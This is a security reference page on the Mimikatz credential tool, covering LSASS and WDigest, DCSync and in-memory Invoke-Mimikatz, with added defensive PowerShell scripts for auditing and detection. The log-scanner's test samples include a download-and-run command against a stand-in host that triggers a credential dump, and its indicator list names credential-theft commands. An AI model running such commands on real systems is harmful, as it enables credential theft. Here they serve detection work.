Mimikatz

Mimikatz Overview

Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy, first created in 2007 to learn more about Windows credentials (and as a proof of concept). Two optional components provide additional features: mimidrv (a driver to interact with the Windows kernel) and mimilib (AppLocker bypass, authentication package/SSP, password filter, and sekurlsa for WinDBG).

Mimikatz requires administrator or SYSTEM rights, and often debug rights (SeDebugPrivilege, enabled with privilege::debug), in order to perform certain actions and interact with the LSASS process (depending on the action requested).

Mimikatz & Credentials

After a user logs on, a variety of credentials are generated and stored in memory in the Local Security Authority Subsystem Service (LSASS) process. This is meant to facilitate single sign-on (SSO), ensuring a user isn't prompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is shorter than 15 characters, depending on Windows OS version and patch level), and even clear-text passwords (to support WDigest and SSP authentication, among others).

In order to prevent a clear-text password from being placed in LSASS, the following registry value needs to be set to 0 (Digest disabled):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
: "UseLogonCredential" (DWORD)

This registry value is worth monitoring in your environment, since an attacker may wish to set it to 1 to enable Digest password support, which forces clear-text passwords to be placed in LSASS on any version of Windows from Windows 7/2008 R2 onward (Windows 10 and Server 2012 R2 included). On Windows 7/8/2008 R2/2012 the value only exists once KB2871997 is installed, and an absent value still means "store", so it must be set to 0 explicitly. Windows 8.1/2012 R2 and newer do not have a UseLogonCredential DWORD value by default (absent means "do not store"), so an attacker would have to create it; on those systems the mere existence of the value may indicate tampering. In either direction the change only affects logons that happen afterwards: credentials already cached in LSASS stay there until the user logs on again or the system reboots.
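The following script is an added example, not code from the original page or from the Mimikatz project. It reads the UseLogonCredential value described above, interprets it according to the OS build (absent means "store" on Windows 7/8/2008 R2/2012 but "do not store" on 8.1/2012 R2 and newer), flags an explicit 1 as tampering, and provides the hardened setting. It uses only built-in cmdlets and must be run from an elevated session; the output field names are this example's own.

```powershell
# Added example (not from the original page): audit and remediate the WDigest
# UseLogonCredential value that decides whether LSASS keeps clear-text passwords.
# Run from an elevated PowerShell session on the host being checked.

$WDigestPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$ValueName   = 'UseLogonCredential'

function Get-WDigestStatus {
    # Reads the value and interprets it for this OS build.
    $osVersion = [version](Get-CimInstance -ClassName Win32_OperatingSystem).Version
    $item  = Get-ItemProperty -Path $WDigestPath -Name $ValueName -ErrorAction SilentlyContinue
    $value = if ($null -ne $item) { $item.$ValueName } else { $null }

    # Windows 8.1 / Server 2012 R2 (NT 6.3) and newer treat an absent value as
    # "do not store". Windows 7 / 8 / 2008 R2 / 2012 store clear-text passwords
    # unless the value is explicitly 0 (possible only after KB2871997).
    $absentMeansDisabled = ($osVersion.Major -gt 6) -or
                           ($osVersion.Major -eq 6 -and $osVersion.Minor -ge 3)

    if ($null -eq $value) {
        $state  = 'absent'
        $stores = -not $absentMeansDisabled
    } elseif ($value -eq 0) {
        $state  = 'explicit 0'
        $stores = $false
    } else {
        $state  = "explicit $value"
        $stores = $true
    }

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        OSVersion          = $osVersion.ToString()
        UseLogonCredential = $state
        ClearTextInLsass   = $stores
        # An explicit 1 has no legitimate reason on any build; on 8.1/2012 R2+
        # the value should not exist at all, so its presence means someone created it.
        Tampered           = ($value -eq 1)
    }
}

function Set-WDigestDisabled {
    # Hardened state: explicitly create/set the DWORD to 0 on every build, so the
    # result does not depend on OS defaults or patch level.
    if (-not (Test-Path $WDigestPath)) { New-Item -Path $WDigestPath -Force | Out-Null }
    New-ItemProperty -Path $WDigestPath -Name $ValueName -PropertyType DWord -Value 0 -Force | Out-Null
    # Credentials already cached in LSASS stay until the next logon or reboot.
}

Get-WDigestStatus | Format-List
# Uncomment to remediate:
# Set-WDigestDisabled; Get-WDigestStatus | Format-List
```

Setting the value to 0 explicitly everywhere (rather than relying on the newer default of "absent") keeps the check simple and makes any later change to 1 stand out. To catch that change as it happens, audit the key with a registry SACL (Security Event ID 4657) or with Sysmon Event ID 13 (RegistryEvent, value set) scoped to this path.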

Running Mimikatz Remotely

Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capabilities that can be run remotely. This includes running Mimikatz against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, which retrieves password data for any Active Directory account in the domain from a Domain Controller without any Mimikatz code being run on the DC. DCSync uses Microsoft's official Domain Controller replication protocol (MS-DRSR) to ask the DC for the account's secrets as if it were another DC; the only prerequisite is that the account running it holds the directory replication rights (Replicating Directory Changes and Replicating Directory Changes All on the domain object) that are normally held only by Domain Controllers and domain administrators.
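Because DCSync is legitimate replication traffic once the rights exist, the practical check is who holds those rights on the domain object. The script below is an added example (not code from the original page or from Mimikatz) that enumerates every ACE on the domain naming context granting the replication extended rights, full control, or "all extended rights", and marks principals outside a baseline list. It assumes the RSAT ActiveDirectory module is installed and that the caller can read the domain object's ACL; the baseline of expected principals is this example's assumption and must be tuned per environment.

```powershell
# Added example (not from the original page): enumerate who holds the directory
# replication rights that DCSync needs on the domain naming context. Assumes the
# RSAT ActiveDirectory module and read access to the domain object's ACL.
Import-Module ActiveDirectory

# Schema GUIDs of the control-access rights involved (controlAccessRight objects
# in CN=Extended-Rights,CN=Configuration).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DCSyncCapablePrincipals {
    param([string]$DomainDN)

    $domain = Get-ADDomain
    if (-not $DomainDN) { $DomainDN = $domain.DistinguishedName }

    # Baseline of principals expected to hold these rights (this example's
    # assumption). Tune for your environment, e.g. the Azure AD Connect /
    # Entra Connect MSOL_ service account.
    $expected = @(
        'NT AUTHORITY\SYSTEM',
        'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
        'BUILTIN\Administrators',
        "$($domain.NetBIOSName)\Domain Controllers",
        "$($domain.NetBIOSName)\Domain Admins",
        "$($domain.NetBIOSName)\Enterprise Admins"
    )

    $all = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $ext = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $rightName = $null
        if ($ace.ActiveDirectoryRights.HasFlag($all)) {
            # Full control implies every extended right, replication included.
            $rightName = 'GenericAll (full control)'
        } elseif ($ace.ActiveDirectoryRights.HasFlag($ext)) {
            if ($ace.ObjectType -eq [guid]::Empty) {
                # ExtendedRight with an empty ObjectType means all extended rights.
                $rightName = 'All extended rights'
            } elseif ($ReplicationRights.ContainsKey($ace.ObjectType.ToString())) {
                $rightName = $ReplicationRights[$ace.ObjectType.ToString()]
            }
        }
        if (-not $rightName) { continue }

        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Right     = $rightName
            Inherited = $ace.IsInherited
            Expected  = $expected -contains $ace.IdentityReference.Value
        }
    }
}

Get-DCSyncCapablePrincipals | Sort-Object Expected, Principal | Format-Table -AutoSize
```

Any row with Expected = False is a DCSync-capable account that needs a justification. For detection after the fact, the same GUIDs appear in Security Event ID 4662 (an operation was performed on an object) on the DC when the replication right is exercised; a 4662 carrying one of these property GUIDs from an account that is not a Domain Controller is the classic DCSync signal.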

PowerShell and Mimikatz

The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the Invoke-Mimikatz PowerShell script, which leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.

What gives Invoke-Mimikatz its "magic" is the ability to reflectively load the Mimikatz DLL (embedded in the script as base64-encoded 32-bit and 64-bit images) into memory. The Invoke-Mimikatz code can be downloaded from the Internet and executed from memory without anything touching the disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems (its -ComputerName parameter wraps Invoke-Command) as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system. The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. Note that "nothing touches disk" does not mean nothing is logged: PowerShell Script Block Logging records the decoded script (including the embedded DLL), AMSI inspects it on Windows 10 and later, and the credential access itself still opens a handle to LSASS, which process-access auditing (for example Sysmon Event ID 10) sees regardless of how the code was loaded.
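As an added example (not code from the original page, PowerSploit or Empire), the script below shows the defender's side of the in-memory technique just described: it pulls Script Block Logging events (Microsoft-Windows-PowerShell/Operational, Event ID 4104) and matches them against markers that an Invoke-Mimikatz run leaves in the logged script text. The indicator list is this example's own, not a vendor signature, and the sample script blocks at the end are constructed so the matcher can be exercised offline; it assumes Script Block Logging is enabled (PowerShell 5.0 and later).

```powershell
# Added example (not from the original page): scan PowerShell script block logs
# (Microsoft-Windows-PowerShell/Operational, Event ID 4104) for the markers an
# in-memory Invoke-Mimikatz run leaves. Assumes Script Block Logging is enabled.
# The indicator list is this example's own, not a vendor signature.

$Indicators = @(
    'Invoke-Mimikatz',
    'Invoke-ReflectivePEInjection',
    'sekurlsa::',
    'lsadump::dcsync',
    'privilege::debug',
    'TVqQAAMAAAAEAAAA'   # base64 of a PE "MZ" header: an embedded DLL/EXE
)

function Test-ScriptBlockForMimikatz {
    param([Parameter(Mandatory)][string]$ScriptText)
    # Returns the indicators present in the text; nothing returned means clean.
    $Indicators | Where-Object { $ScriptText -match [regex]::Escape($_) }
}

function Get-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            # Properties[2] of a 4104 event carries the (decoded) script block text.
            $text = [string]$_.Properties[2].Value
            $hits = @(Test-ScriptBlockForMimikatz -ScriptText $text)
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Computer   = $_.MachineName
                    Indicators = ($hits -join ', ')
                    Snippet    = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
}

# Constructed sample script blocks (not real log data) to exercise the matcher offline.
$Samples = @(
    'Get-ChildItem C:\Temp | Measure-Object',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command ''"sekurlsa::logonpasswords"''',
    'Invoke-Command -ComputerName dc01 -ScriptBlock { Invoke-Mimikatz -DumpCreds }'
)
foreach ($s in $Samples) {
    $hits = @(Test-ScriptBlockForMimikatz -ScriptText $s)
    $verdict = if ($hits.Count -gt 0) { 'SUSPECT' } else { 'clean' }
    '{0,-8} {1}' -f $verdict, $s
}

# On a live host with logging enabled:
# Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Large script blocks are split across several 4104 events, so an indicator may land in any fragment; the function above matches each fragment independently, which is why it also keys on the base64 PE header rather than only on function names that an attacker can trivially rename.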
